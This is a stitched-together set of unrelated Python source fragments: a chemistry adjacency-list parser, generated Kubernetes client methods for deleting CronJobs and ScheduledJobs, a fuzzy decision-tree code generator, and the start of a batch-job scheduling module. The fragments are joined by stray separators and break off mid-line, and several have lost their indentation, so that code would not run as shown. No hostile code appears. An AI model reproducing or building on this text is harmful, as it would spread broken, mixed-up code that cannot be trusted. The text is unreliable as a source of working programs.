            for aid2 in sorted(bonds[aid1].keys()):
                if aid1 < aid2:
                    atom1 = atomdict[aid1]
                    atom2 = atomdict[aid2]
                    order = bonds[aid1][aid2]
                    if group:
                        bond = GroupBond(atom1, atom2, order)
                    elif len(order) == 1:
                        bond = Bond(atom1, atom2, order[0])
                    else:
                        raise InvalidAdjacencyListError('Multiple bond orders specified for an atom in a Molecule.')
                    atom1.edges[atom2] = bond
                    atom2.edges[atom1] = bond
        # Add explicit hydrogen atoms to complete structure if desired
        if not group:
            valences = {'H': 1, 'C': 4, 'O': 2, 'N': 3, 'S': 2, 'Si': 4, 'He': 0, 'Ne': 0, 'Ar': 0, 'Cl': 1}
            orders = {'S': 1, 'D': 2, 'T': 3, 'B': 1.5}
            newAtoms = []
            for atom in atoms:
                try:
                    valence = valences[atom.symbol]
                except KeyError:
                    raise InvalidAdjacencyListError('Cannot add hydrogens to adjacency list: Unknown valence for atom "{0}".'.format(atom.symbol))
                radical = atom.radicalElectrons
                order = 0
                for atom2, bond in atom.bonds.items():
                    order += orders[bond.order]
                count = valence - radical - int(order)
                for i in range(count):
                    a = Atom('H', 0, 1, 0, '')
                    b = Bond(atom, a, 'S')
                    newAtoms.append(a)
                    atom.bonds[a] = b
                    a.bonds[atom] = b
            atoms.extend(newAtoms)
    except InvalidAdjacencyListError:
        # print() call form is valid on Python 2 and 3; the old
        # `print adjlist` statement is a SyntaxError on Python 3
        print(adjlist)
        raise
    return atoms
################################################################################
def getElectronState(radicalElectrons, spinMultiplicity):
    """
    Return the electron state string corresponding to the given number of
    radical electrons `radicalElectrons` and spin multiplicity
    `spinMultiplicity`.

    Raise a :class:`ValueError` if the electron state cannot be determined.
    """
    # For 0, 1, 3 and 4 radical electrons the spin multiplicity is implied,
    # so a simple lookup suffices.
    unambiguous = {0: '0', 1: '1', 3: '3', 4: '4'}
    if radicalElectrons in unambiguous:
        return unambiguous[radicalElectrons]
    # Two radical electrons may be a singlet ('2S') or a triplet ('2T').
    if radicalElectrons == 2:
        if spinMultiplicity == 1:
            return '2S'
        if spinMultiplicity == 3:
            return '2T'
    raise ValueError('Unable to determine electron state for {0:d} radical electrons with spin multiplicity of {1:d}.'.format(radicalElectrons, spinMultiplicity))
def toAdjacencyList(atoms, label=None, group=False, removeH=False):
"""
Convert a chemical graph defined by a list of `atoms` into a string
adjacency list.
"""
adjlist = ''
# Don't remove hydrogen atoms if the molecule consists only of hydrogen atoms
try:
if removeH and all([atom.element.symbol == 'H' for atom in atoms]): removeH = False
except AttributeError:
pass
if label: adjlist += label + '\n'
# Determine the numbers to use for each atom
atomNumbers = {}
index = 0
for atom in atoms:
if removeH and atom.element.symbol == 'H' and atom.label == '': continue
atomNumbers[atom] = '{0:d}'.format(index + 1)
index += 1
atomLabels = dict([(atom, '{0}'.format(atom.label)) for atom in atomNumbers])
atomTypes = {}
atomElectronStates = {}
if group:
for atom in atomNumbers:
# Atom type(s)
if len(atom.atomType) == 1:
atomTypes[atom] = atom.atomType[0].label
else:
atomTypes[atom] = '{{{0}}}'.format(','.join([a.label for a in atom.atomType]))
# Electron state(s)
if len(atom.radicalElectrons) == 1:
atomElectronStates[atom] = getElectronState(atom.radicalElectrons[0], atom.spinMultiplicity[0])
else:
atomElectronStates[atom] = '{{{0}}}'.format(','.join([getElectronState(radical, spin) for radical, spin in zip(atom.radicalElectrons, atom.spinMultiplicity)]))
else:
for atom in atomNumbers:
# Atom type
atomTypes[atom] = '{0}'.format(atom.element.symbol)
# Electron state(s)
atomElectronStates[atom] = '{0}'.format(getElectronState(atom.radicalElectrons, atom.spinMultiplicity))
# Determine field widths
atomNumberWidth = max([len(s) | |
existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_namespaced_cron_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.delete_namespaced_cron_job_with_http_info(name, namespace, body, **kwargs)
return data
    def delete_namespaced_cron_job_with_http_info(self, name, namespace, body, **kwargs):
        """
        delete a CronJob
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_namespaced_cron_job_with_http_info(name, namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the CronJob (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param V1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
        :param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
        :param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy.
        :return: V1Status
            If the method is called asynchronously,
            returns the request thread.
        """
        # API-visible parameters for this endpoint...
        all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy']
        # ...plus the client-internal options accepted by every generated method.
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Merge kwargs into the local parameter dict, rejecting unknown names.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_namespaced_cron_job" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `delete_namespaced_cron_job`")
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params) or (params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `delete_namespaced_cron_job`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `delete_namespaced_cron_job`")

        collection_formats = {}

        # Endpoint template; {name}/{namespace} are substituted via path_params.
        resource_path = '/apis/batch/v2alpha1/namespaces/{namespace}/cronjobs/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']

        # Optional query-string parameters (only sent when supplied).
        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'grace_period_seconds' in params:
            query_params['gracePeriodSeconds'] = params['grace_period_seconds']
        if 'orphan_dependents' in params:
            query_params['orphanDependents'] = params['orphan_dependents']
        if 'propagation_policy' in params:
            query_params['propagationPolicy'] = params['propagation_policy']

        header_params = {}

        form_params = []
        local_var_files = {}

        # The V1DeleteOptions object is sent as the request body.
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1Status',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def delete_namespaced_scheduled_job(self, name, namespace, body, **kwargs):
"""
delete a ScheduledJob
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_namespaced_scheduled_job(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the ScheduledJob (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_namespaced_scheduled_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.delete_namespaced_scheduled_job_with_http_info(name, namespace, body, **kwargs)
return data
def delete_namespaced_scheduled_job_with_http_info(self, name, namespace, body, **kwargs):
"""
delete a ScheduledJob
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_namespaced_scheduled_job_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the ScheduledJob (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_scheduled_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_namespaced_scheduled_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_namespaced_scheduled_job`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_namespaced_scheduled_job`")
collection_formats = {}
resource_path = '/apis/batch/v2alpha1/namespaces/{namespace}/scheduledjobs/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'grace_period_seconds' in params:
query_params['gracePeriodSeconds'] = params['grace_period_seconds']
if 'orphan_dependents' in params:
query_params['orphanDependents'] = params['orphan_dependents']
if 'propagation_policy' in params:
query_params['propagationPolicy'] = params['propagation_policy']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
| |
import ast
from collections import OrderedDict
from io import StringIO
from typing import List, Dict, Any, Tuple, Optional
import dectree.propfuncs as propfuncs
from dectree.config import CONFIG_NAME_INPUTS_NAME, CONFIG_NAME_OUTPUTS_NAME, CONFIG_NAME_PARAMS_NAME
from .config import get_config_value, \
CONFIG_NAME_VECTORIZE, CONFIG_NAME_PARAMETERIZE, CONFIG_NAME_FUNCTION_NAME, CONFIG_NAME_TYPES, VECTORIZE_FUNC, \
VECTORIZE_PROP, CONFIG_NAME_OR_PATTERN, CONFIG_NAME_NOT_PATTERN, \
CONFIG_NAME_NO_JIT, VECTORIZE_NONE, CONFIG_NAME_AND_PATTERN
from .types import VarName, PropName, TypeName, PropDef, TypeDefs, VarDefs, PropFuncParamName
def gen_code(type_defs,
             input_defs,
             output_defs,
             rules,
             **options):
    """Generate decision-tree Python source code and return it as a string.

    The positional arguments and keyword *options* are the same ones
    accepted by :class:`CodeGen`.
    """
    sink = StringIO()
    generator = CodeGen(type_defs, input_defs, output_defs, rules, sink, options)
    generator.gen_code()
    return sink.getvalue()
class CodeGen:
    """Emits Python source code that evaluates a set of fuzzy decision rules.

    The generated module contains property (membership) functions derived
    from ``type_defs``, numba-jit-able input/output/parameter classes, and a
    single apply-rules function produced from ``rules``. Output is written
    to ``out_file`` via :meth:`gen_code`.
    """

    def __init__(self,
                 type_defs,
                 input_defs,
                 output_defs,
                 rules,
                 out_file,
                 options):
        # Fail fast on missing configuration; all of these are required.
        assert type_defs
        assert input_defs
        assert output_defs
        assert rules
        assert out_file
        self.type_defs = type_defs
        self.input_defs = input_defs
        self.output_defs = output_defs
        self.rules = rules
        self.out_file = out_file
        # Maps output variable name -> list of assignment expressions;
        # populated during gen_code().
        self.output_assignments = None
        options = dict(options or {})
        self.no_jit = get_config_value(options, CONFIG_NAME_NO_JIT)
        self.vectorize = get_config_value(options, CONFIG_NAME_VECTORIZE)
        self.parameterize = get_config_value(options, CONFIG_NAME_PARAMETERIZE)
        self.function_name = get_config_value(options, CONFIG_NAME_FUNCTION_NAME)
        self.inputs_name = get_config_value(options, CONFIG_NAME_INPUTS_NAME)
        self.outputs_name = get_config_value(options, CONFIG_NAME_OUTPUTS_NAME)
        self.params_name = get_config_value(options, CONFIG_NAME_PARAMS_NAME)
        self.use_py_types = get_config_value(options, CONFIG_NAME_TYPES)
        self.and_pattern = _get_config_op_pattern(options, CONFIG_NAME_AND_PATTERN)
        self.or_pattern = _get_config_op_pattern(options, CONFIG_NAME_OR_PATTERN)
        self.not_pattern = _get_config_op_pattern(options, CONFIG_NAME_NOT_PATTERN)
        self.expr_gen = ExprGen(type_defs, input_defs,
                                parameterize=self.parameterize,
                                vectorize=self.vectorize,
                                no_jit=self.no_jit,
                                not_pattern=self.not_pattern,
                                and_pattern=self.and_pattern,
                                or_pattern=self.or_pattern)

    def gen_code(self):
        """Write the complete generated module to ``self.out_file``."""
        self.output_assignments = {}
        self._write_imports()
        self._write_type_prop_functions()
        self._write_inputs_class()
        self._write_outputs_class()
        self._write_params()
        self._write_apply_rules_function()

    def _write_imports(self):
        """Emit the numba/numpy import lines required by the chosen options."""
        numba_import = 'from numba import jit, jitclass, float64'
        numpy_import = 'import numpy as np'
        if self.no_jit:
            if self.vectorize == VECTORIZE_FUNC:
                self._write_lines('', numpy_import)
        else:
            if self.vectorize == VECTORIZE_PROP:
                self._write_lines('', numba_import + ', vectorize', numpy_import)
            elif self.vectorize == VECTORIZE_FUNC:
                self._write_lines('', numba_import, numpy_import)
            else:
                self._write_lines('', numba_import)

    def _write_type_prop_functions(self):
        """Emit one membership function per (type, property) pair."""
        numba_decorator = self._get_numba_decorator(prop_func=True)
        for type_name, type_def in self.type_defs.items():
            for prop_name, prop_def in type_def.items():
                prop_value, func_params, func_body_pattern = prop_def
                if self.parameterize and func_params:
                    # Expose the property's tunable constants as extra args
                    func_header = 'def _{}_{}(x{}):'.format(type_name, prop_name, ', ' + ', '.join(func_params.keys()))
                    func_body = func_body_pattern.format(**{key: key for key in func_params.keys()})
                else:
                    func_header = 'def _{}_{}(x):'.format(type_name, prop_name)
                    func_body = func_body_pattern.format(**func_params)
                func_body_lines = map(lambda line: '    ' + str(line), func_body.split('\n'))
                self._write_lines('', '',
                                  numba_decorator,
                                  func_header,
                                  '    # {}.{}: {}'.format(type_name, prop_name, prop_value),
                                  *func_body_lines)

    def _write_apply_rules_function(self):
        """Emit the top-level rule evaluation function."""
        if self.parameterize:
            function_params = [('inputs', self.inputs_name),
                               ('outputs', self.outputs_name),
                               ('params', self.params_name)]
        else:
            function_params = [('inputs', self.inputs_name),
                               ('outputs', self.outputs_name)]
        if self.use_py_types:
            function_args = ', '.join(['{}: {}'.format(param_name, param_type)
                                       for param_name, param_type in function_params])
        else:
            function_args = ', '.join(['{}'.format(param_name)
                                       for param_name, _ in function_params])
        numba_decorator = self._get_numba_decorator()
        self._write_lines('', '',
                          numba_decorator,
                          'def {}({}):'.format(self.function_name, function_args))
        if self.vectorize == VECTORIZE_FUNC:
            # Element-wise loop over the (1-D) output arrays
            output_var = list(self.output_defs.keys())[0]
            self._write_lines('    for i in range(len(outputs.{output_var})):'.format(output_var=output_var))
            self._write_lines('        t0 = 1.0')
        else:
            self._write_lines('    t0 = 1.0')
        for rule in self.rules:
            self._write_rule(rule, 1, 1)

    def _get_numba_decorator(self, prop_func=False):
        """Return the decorator line for a generated function.

        The decorator is commented out when jit compilation is disabled.
        """
        if self.vectorize == VECTORIZE_PROP and prop_func:
            numba_decorator = '@vectorize([float64(float64)])'
        else:
            numba_decorator = '@jit(nopython=True)'
        if self.no_jit:
            numba_decorator = '# ' + numba_decorator
        return numba_decorator

    def _write_inputs_class(self):
        self._write_io_class(self.inputs_name, self.input_defs)

    def _write_outputs_class(self):
        self._write_io_class(self.outputs_name, self.output_defs)

    def _write_io_class(self, class_name, var_defs):
        self._write_class(class_name, var_defs.keys())

    def _write_params(self):
        """Emit the parameter class holding every tunable property constant."""
        if not self.parameterize:
            return
        param_names = []
        param_values = {}
        for type_name, type_def in self.type_defs.items():
            for prop_name, prop_def in type_def.items():
                prop_value, func_params, func_body = prop_def
                for param_name, param_value in func_params.items():
                    qualified_param_name = _get_qualified_param_name(type_name, prop_name, param_name)
                    param_names.append(qualified_param_name)
                    param_values[qualified_param_name] = param_value
        self._write_class(self.params_name, param_names, param_values)

    # See http://numba.pydata.org/numba-doc/dev/user/jitclass.html
    def _write_class(self, class_name, var_names, param_values: Optional[Dict[str, Any]] = None):
        """Emit a jitclass with one float64 field per name in *var_names*.

        When *param_values* is given the class is a parameter holder with
        scalar defaults; otherwise it is an input/output container.
        """
        is_io = param_values is None
        spec_name = '_{}Spec'.format(class_name)
        spec_lines = ['{} = ['.format(spec_name)]
        for var_name in var_names:
            if param_values:
                spec_lines.append('    ("{}", float64),'.format(var_name))
            elif not self.no_jit and self.vectorize != VECTORIZE_NONE:
                spec_lines.append('    ("{}", float64[:]),'.format(var_name))
            else:
                spec_lines.append('    ("{}", float64),'.format(var_name))
        spec_lines.append(']')
        if self.no_jit:
            spec_lines = map(lambda line: '# ' + line, spec_lines)
        self._write_lines('', '', *spec_lines)
        numba_line = '@jitclass({})'.format(spec_name)
        if self.no_jit:
            numba_line = '# ' + numba_line
        if is_io and self.vectorize == VECTORIZE_FUNC:
            if self.use_py_types:
                init_head = '    def __init__(self, size: int):'
            else:
                init_head = '    def __init__(self, size):'
        else:
            init_head = '    def __init__(self):'
        self._write_lines('', '',
                          numba_line,
                          'class {}:'.format(class_name),
                          init_head)
        for var_name in var_names:
            if param_values:
                self._write_lines('        self.{} = {}'.format(var_name, param_values[var_name]))
            elif is_io and self.vectorize == VECTORIZE_FUNC:
                self._write_lines('        self.{} = np.zeros(size, dtype=np.float64)'.format(var_name))
            elif self.vectorize != VECTORIZE_NONE:
                self._write_lines('        self.{} = np.zeros(1, dtype=np.float64)'.format(var_name))
            else:
                self._write_lines('        self.{} = 0.0'.format(var_name))

    def _write_rule(self, rule: List, source_level: int, target_level: int):
        """Recursively emit code for one rule (a list of statements)."""
        sub_target_level = target_level
        for stmt in rule:
            keyword = stmt[0]
            if keyword == 'if':
                sub_target_level = target_level
                self._write_stmt(keyword, stmt[1], stmt[2], source_level, sub_target_level)
            elif keyword == 'elif':
                sub_target_level += 1
                self._write_stmt(keyword, stmt[1], stmt[2], source_level, sub_target_level)
            elif keyword == 'else':
                self._write_stmt(keyword, None, stmt[1], source_level, sub_target_level)
            elif keyword == '=':
                self._write_assignment(stmt[1], stmt[2], source_level, sub_target_level)
            else:
                # Fixed: the original raised the NotImplemented singleton,
                # which is itself a TypeError on Python 3.
                raise NotImplementedError('Unsupported rule statement keyword: {!r}'.format(keyword))

    def _write_stmt(self,
                    keyword: str,
                    condition_expr: Optional[str],
                    body: List,
                    source_level: int,
                    target_level: int):
        """Emit the fuzzy truth-value updates for an if/elif/else statement."""
        not_pattern = '1.0 - {x}'  # note, not using self.not_pattern here!
        source_indent = (4 * source_level) * ' '
        if self.vectorize == VECTORIZE_FUNC:
            target_indent = 8 * ' '
        else:
            target_indent = 4 * ' '
        t0 = 't' + str(target_level - 1)
        t1 = 't' + str(target_level - 0)
        if keyword == 'if' or keyword == 'elif':
            condition = self.expr_gen.gen_expr(condition_expr)
            if keyword == 'if':
                self._write_lines('{tind}#{sind}{key} {expr}:'.format(tind=target_indent, sind=source_indent,
                                                                      key=keyword, expr=condition_expr))
                target_value = self.and_pattern.format(x=t0, y=condition)
            else:
                # elif: first fold "not previous branch" into the parent truth
                # value, then AND with this branch's condition
                tp = 't' + str(target_level - 2)
                self._write_lines('{tind}#{sind}{key} {expr}:'.format(tind=target_indent, sind=source_indent,
                                                                      key=keyword, expr=condition_expr))
                target_value = self.and_pattern.format(x=tp, y=not_pattern.format(x=t0))
                self._write_lines('{tind}{tvar} = {tval}'.format(tind=target_indent, tvar=t0, tval=target_value))
                target_value = self.and_pattern.format(x=t0, y=condition)
        else:
            self._write_lines('{tind}#{sind}else:'.format(tind=target_indent, sind=source_indent))
            target_value = self.and_pattern.format(x=t0, y=not_pattern.format(x=t1))
        self._write_lines('{tind}{tvar} = {tval}'.format(tind=target_indent, tvar=t1, tval=target_value))
        self._write_rule(body, source_level + 1, target_level + 1)

    def _write_assignment(self, var_name: str, var_value: str, source_level: int, target_level: int):
        """Emit an output assignment, OR-combining repeated assignments."""
        source_indent = (source_level * 4) * ' '
        if self.vectorize == VECTORIZE_FUNC:
            target_indent = 8 * ' '
        else:
            target_indent = 4 * ' '
        t0 = 't' + str(target_level - 1)
        _, prop_def = self._get_output_def(var_name, var_value)
        prop_value, _, _ = prop_def
        if prop_value == 'true()':
            assignment_value = t0
        elif prop_value == 'false()':
            assignment_value = self.not_pattern.format(x=t0)
        else:
            raise ValueError('Currently you can only assign properties,'
                             ' whose values are "true()" or "false()')
        output_assignments = self.output_assignments.get(var_name)
        if output_assignments is None:
            output_assignments = [assignment_value]
            self.output_assignments[var_name] = output_assignments
        else:
            output_assignments.append(assignment_value)
        out_pattern = '{tval}'
        if len(output_assignments) > 1:
            # Later assignments OR with the value already written
            if self.vectorize == VECTORIZE_FUNC:
                out_pattern = self.or_pattern.format(x='outputs.{name}[i]', y=out_pattern)
            else:
                out_pattern = self.or_pattern.format(x='outputs.{name}', y=out_pattern)
        if self.vectorize == VECTORIZE_FUNC:
            line_pattern = '{tind}outputs.{name}[i] = ' + out_pattern
        else:
            line_pattern = '{tind}outputs.{name} = ' + out_pattern
        self._write_lines('{tind}#{sind}{name} = {sval}'.format(tind=target_indent, sind=source_indent,
                                                                name=var_name, sval=var_value))
        self._write_lines(line_pattern.format(tind=target_indent, name=var_name,
                                              tval=assignment_value))

    def _get_output_def(self, var_name: VarName, prop_name: PropName) -> Tuple[TypeName, PropDef]:
        return _get_type_name_and_prop_def(var_name, prop_name, self.type_defs, self.output_defs)

    def _write_lines(self, *lines):
        """Write each line to the output file, newline-terminated."""
        for line in lines:
            self.out_file.write('%s\n' % line)
class ExprGen:
    """
    Translates Python rule-condition expressions into fuzzy-logic expressions.

    Conditions are parsed with :mod:`ast`; comparisons of the form
    ``input_var == PropName`` become calls of the generated property
    functions, while ``not`` / ``and`` / ``or`` are mapped onto the
    configured fuzzy operator patterns (``not_pattern`` etc.).
    """

    def __init__(self,
                 type_defs: TypeDefs,
                 var_defs: VarDefs,
                 parameterize=False,
                 vectorize=VECTORIZE_NONE,
                 no_jit=False,
                 not_pattern='1.0 - ({x})',
                 and_pattern='min({x}, {y})',
                 or_pattern='max({x}, {y})'):
        # Fail fast on missing configuration; these are all required.
        assert type_defs
        assert var_defs
        assert vectorize
        assert not_pattern
        assert and_pattern
        assert or_pattern
        self.type_defs = type_defs
        self.var_defs = var_defs
        self.parameterize = parameterize
        self.vectorize = vectorize
        self.no_jit = no_jit
        self.not_pattern = not_pattern
        self.and_pattern = and_pattern
        self.or_pattern = or_pattern

    def gen_expr(self, rule_condition: str) -> str:
        """Parse *rule_condition* and return the transpiled fuzzy expression.

        Raises ValueError if the string is not a single expression.
        """
        mod = ast.parse(rule_condition)
        body = mod.body
        if len(body) != 1 or not isinstance(body[0], ast.Expr):
            raise ValueError('Invalid condition expression: [{}]'.format(rule_condition))
        expr = body[0].value
        return self._transpile_expression(expr)

    def _transpile_expression(self, expr) -> str:
        """Recursively convert an :mod:`ast` node into fuzzy-logic source text."""
        if isinstance(expr, ast.Compare):
            # e.g. "radiance == HIGH": left must name an input variable,
            # the comparator names one of that variable's type properties.
            left = expr.left
            if not isinstance(left, ast.Name):
                raise ValueError('Left side of comparison must be the name of an input')
            var_name = expr.left.id
            prop_name = expr.comparators[0].id
            compare_op = expr.ops[0]
            if isinstance(compare_op, ast.Eq) or isinstance(compare_op, ast.Is):
                if self.vectorize == VECTORIZE_FUNC:
                    op_pattern = '_{t}_{r}(inputs.{l}{p}[i])'
                else:
                    op_pattern = '_{t}_{r}(inputs.{l}{p})'
            elif isinstance(compare_op, ast.NotEq) or isinstance(compare_op, ast.IsNot):
                # Negated membership: wrap the property call in not_pattern
                if self.vectorize == VECTORIZE_FUNC:
                    op_pattern = self.not_pattern.format(x='_{t}_{r}(inputs.{l}{p}[i])')
                else:
                    op_pattern = self.not_pattern.format(x='_{t}_{r}(inputs.{l}{p})')
            else:
                raise ValueError('"==", "!=", "is", and "is not" are the only supported comparison operators')
            type_name, prop_def = _get_type_name_and_prop_def(var_name, prop_name, self.type_defs, self.var_defs)
            _, func_params, _ = prop_def
            if self.parameterize and func_params:
                # Pass the tunable constants through from the params object
                params = ', ' + ', '.join(['{p}=params.{qp}'.format(p=param_name,
                                                                    qp=_get_qualified_param_name(type_name,
                                                                                                 prop_name,
                                                                                                 param_name))
                                           for param_name in func_params.keys()])
            else:
                params = ''
            return op_pattern.format(t=type_name, r=prop_name, l=var_name, p=params)
        if isinstance(expr, ast.UnaryOp):
            op = expr.op
            if isinstance(op, ast.Not):
                op_pattern = self.not_pattern
            else:
                raise ValueError('"not" is the only supported unary operator')
            v = expr.operand
            t = self._transpile_expression(v)
            return op_pattern.format(x=t)
        if isinstance(expr, ast.BoolOp):
            op = expr.op
            if isinstance(op, ast.And):
                op_pattern = self.and_pattern
            elif isinstance(op, ast.Or):
                op_pattern = self.or_pattern
            else:
                raise ValueError('"and" and "or" are the only supported binary operators')
            # Left-fold the operand list: a op b op c -> op(op(a, b), c)
            t1 = None
            for v in expr.values:
                if t1 is None:
                    t1 = self._transpile_expression(v)
                else:
                    t2 = self._transpile_expression(v)
                    t1 = op_pattern.format(x=t1, y=t2)
            return t1
        raise ValueError('Unsupported expression')
def _types_to_type_defs(types: Dict[str, Dict[str, str]]) -> TypeDefs:
type_defs = OrderedDict()
for type_name, type_properties in types.items():
type_def = {}
type_defs[type_name] = type_def
for prop_name, prop_value in type_properties.items():
try:
prop_result = eval(prop_value, vars(propfuncs), | |
<reponame>SPIDER-CMB/xfaster<filename>xfaster/batch_tools.py<gh_stars>1-10
import os
import stat
import shutil
import subprocess as sp
import tempfile
import re
import datetime as dt
from warnings import warn
import numpy as np
import argparse as ap
__all__ = ["get_job_logfile", "batch_sub", "batch_group", "JobArgumentParser"]
def get_job_logfile():
    """
    Return a log-file path derived from the scheduler job environment.

    Returns
    -------
    logfile : str or None
        Path to the log file, or None when running interactively or
        outside of any PBS/SLURM job.
    """
    if os.getenv("PBS_O_WORKDIR"):
        # Interactive PBS sessions do not get a log file.
        if os.getenv("PBS_ENVIRONMENT") == "PBS_INTERACTIVE":
            return None
        jobid = os.getenv("PBS_JOBID").split(".", 1)[0]
        return os.path.join(
            os.getenv("PBS_O_WORKDIR"),
            "{}.u{}".format(os.getenv("PBS_JOBNAME"), jobid),
        )
    if os.getenv("SLURM_SUBMIT_DIR"):
        jobname = os.getenv("SLURM_JOB_NAME")
        # An interactive shell shows up with job name "bash".
        if jobname == "bash":
            return None
        jobid = os.getenv("SLURM_JOB_ID").split(".", 1)[0]
        # TODO generate different logs for multiple processes in same job?
        return os.path.join(
            os.getenv("SLURM_SUBMIT_DIR"), "{}-{}.log".format(jobname, jobid)
        )
    return None
def format_time(t):
    """
    Format a time to string for use by qsub.

    Arguments
    ---------
    t : str, float or datetime.timedelta
        The time for the job.  Strings must be of the form HH:MM:SS;
        floating point values are interpreted as a number of hours.

    Returns
    -------
    time : str
        Time in the H:MM:SS format expected by the scheduler.

    Raises
